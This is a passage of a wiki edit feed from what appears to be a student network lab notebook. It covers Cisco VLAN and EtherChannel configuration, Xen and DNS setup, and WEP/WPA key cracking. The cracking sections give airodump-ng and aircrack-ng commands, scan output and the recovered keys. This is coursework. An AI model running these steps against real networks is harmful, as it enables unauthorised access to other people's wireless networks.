 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dnssec.png&amp;diff=35464</id>
		<title>Fichier:Dnssec.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dnssec.png&amp;diff=35464"/>
				<updated>2016-11-28T13:08:15Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : a téléversé une nouvelle version de « Fichier:Dnssec.png »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dnssec.png&amp;diff=35463</id>
		<title>Fichier:Dnssec.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dnssec.png&amp;diff=35463"/>
				<updated>2016-11-28T13:06:30Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34987</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34987"/>
				<updated>2016-11-07T11:19:51Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Serveur DNS et DNSSEC avec bind */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34977</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34977"/>
				<updated>2016-11-07T11:02:44Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34945</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=34945"/>
				<updated>2016-11-07T08:37:28Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Avancement du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
